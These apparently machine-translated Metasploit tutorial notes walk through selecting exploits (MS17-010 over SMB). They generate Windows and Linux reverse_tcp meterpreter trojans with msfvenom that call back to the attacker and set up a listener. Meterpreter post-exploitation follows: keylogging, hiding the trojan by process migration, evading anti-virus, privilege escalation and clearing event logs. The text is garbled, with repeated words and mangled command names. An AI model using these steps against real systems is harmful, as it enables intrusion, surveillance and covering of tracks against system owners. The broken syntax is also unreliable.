Msf basis
Metasploit- Framework (written in Ruby) foundation:
MSF has the world’s largest database of penetration test attacks
Vulnerability: A Vulnerability
Expoit: Attack code or program
Payload: code that completes the actual attack function
Module: Basic building blocks that make up the complete system, each of which performs a specific task
Running MSF.
1. Sudo service postgresQL start 2Copy the codeMSF architecture:
Introduction to MSF module:
Exploits: The core module of MSF, which contains attacks on different services for different operating systems, including MAC and Android
Encoders is useless, code, you can provide your own code
I didn’t do anything to avoid killing. Now I can’t avoid getting killed
Ms17-010: MS refers to Microsoft 17-010 refers to vulnerability 010 of year 17
MSF basic commands:
| The command | instructions |
|---|---|
| Use | Select the penetration attack module |
| Show payloads | View the attack payloads compatible with the attack module |
| Set payloads | Set the attack payload |
| Set target | Set the target |
| Show options | View the configuration parameters to be set |
| Exploit | Conduct penetration test attacks |
Note: metasploit penetration attack module in the directory: / usr/share/metasploit framework/modules/exploits
MSF direct penetration
Exp: Search module
2. Switch use to the corresponding expolit based on the module to be attacked, and then show options to view the content to be configured
Required as yes is the service that must be configured
445 is SMB service, which Windows must enable
3. Set rhosts IP (you can also specify files) to configure attack IP addresses
Payload payload payload payload payload payload payload payload payload payload payload payload
Linux(Windows)/x64/meterpreter/ bind_ipv6_TCP is (with bind) opening a port on the server waiting for our attacker to connect
Linux(Windows)/ X64 / Meterpreter/Reverse_name_PIPE (with reverse) opens a port locally and waits for the controlled server to actively connect
The last two types of name_pipe, ipv6_TCP, TCP, tcp_RC4, etc., refer to connection protocols
Set payload Linux(Windows)/ X64 /meterpreter/ reverse_name_PIPE Configuration payload
Show options Displays information to be set
Therefore, the MSF remote control is configured with expolit and payload
Search module –> use expolit –> show options –> exp –> show payloads –> set payload.. –> show options –> configure payloads –> expolit
MSF attack principle:
[*] is the attack process: first open port 4444 on the machine
The auxiliary module of the Auxiliary is then called to scan
A live host is detected and the attack begins
Red indicates that the attack failed
Two, MSF remote control function:
Command: msfvenom
Generate a controlled exe program, a Trojan horse on the server
Msf -i payloads Lists all payload loads
Msfvenom –list plantform Views the platforms that support the generation of trojans
Generate remote control Trojan for Windows:
1. Generate Trojan horse by Msfvenom
Msfnom -p Specifies payload LHOST= IP address of the attack plane (do not use 127.0.0.1) LPORT= connection port number -f Specifies payload Output format > output location and name
For example: generate Windows bounce shell Trojan:
Msfvenom -p Windows/meterpreter/reverse_tcp LHOST = < strike > IP address LPORT = > < connection port - f exe > name. Exe
Generate Linux bounce shell Trojan:
Msfvenom -p Linux/x86 / meterpreter/reverse_tcp LHOST = < strike > IP address LPORT = > < connection port - f the elf > name. The elf
2. Upload the Trojan horse to the target computer
3. Listen for the rebound shell in MSFConsole
Enable Metasploit set listening parameters: Metaspolit handler handler Hander sets payload in the exploit/multi, which is the same as the payload used in the previous production of the Trojan horse. Hander sets lhost and Lport (the same parameters as the previous production of the Trojan horse). Expolit listens and waits for the controlled end to open the Trojan horseCopy the code
Session-l Displays the enabled session
The MSF payload is sent in two segments. The core payload is sent first, and then the core payload is used to download other payloads. If the connection fails, only the core payload exists
After successful monitoring,shell enters the target terminal
There are also many commands, screenshot screenshots, keyscan_start to enable keyboard listening,mouse mouse, etc
LCD Switches the local path
Upload the SRC file to the target’s current directory for uploading subsequent files
Meterpreter overview
Introduction:
·Meterpreter is a killer in the Metasploit framework. It is usually used as the attack payload after the vulnerability overflows. After the attack payload triggers the vulnerability, it can return to us a control channel.
· For example: using a vulnerability of remote procedure call (RPC) service, when the vulnerability is triggered, we select Meterpreter as the attack payload and can obtain a Meterpreter Shell connection on the target system.
·Meterpreter is an extension module of Metasploit framework, which can call some Metasploit functions, such as anti-trace, pure memory working mode, password hashing, privilege promotion, gangplank attack, etc., to further penetrate the target system
Technical advantages:
·Metasploit provides Meterpreter versions for all major platforms, including Windows and Linux, as well as x86 and X64.
·Meterpreter works in pure memory mode, which has the advantage of hiding startup and is difficult to detect by anti-virus software. There’s no need to access the target host disk, so there’s no sign of an intrusion.
· In addition, Meterpreter provides implementations based on PHP and Java languages.
Reverse_tcp:
Hide Trojan horse methods: Process injection (requires highest privileges)
Ps Displays the current process
Migrate -p PID Migrates the current Trojan horse process to the PID, usually to the system application, since the Trojan horse will be shut down when the migration application is shut down
Session-j-z suspends the listening mode, that is, the task can continue to execute and listen in the background
After the attack was complete, Clearev knew the event log
Various other utility commands:
Getsystem attempts to claim rights
Play music
Portwd Port forwarding
Execute file
Sysinfo gets some information about the target system
Shutdown Shuts down the target host